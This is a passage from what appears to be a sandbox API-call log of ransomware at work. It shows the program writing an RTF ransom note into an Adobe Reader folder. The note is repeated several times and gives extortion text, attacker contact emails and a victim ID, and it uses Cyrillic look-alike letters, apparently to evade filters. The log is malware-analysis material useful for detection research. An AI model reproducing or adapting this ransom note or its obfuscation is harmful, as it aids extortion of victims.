t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.272] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.273] CloseHandle (hObject=0x1cc) returned 1 [0066.274] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\bg85_info.rtf")) returned 0xffffffff [0066.274] GetLastError () returned 0x2 [0066.274] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All 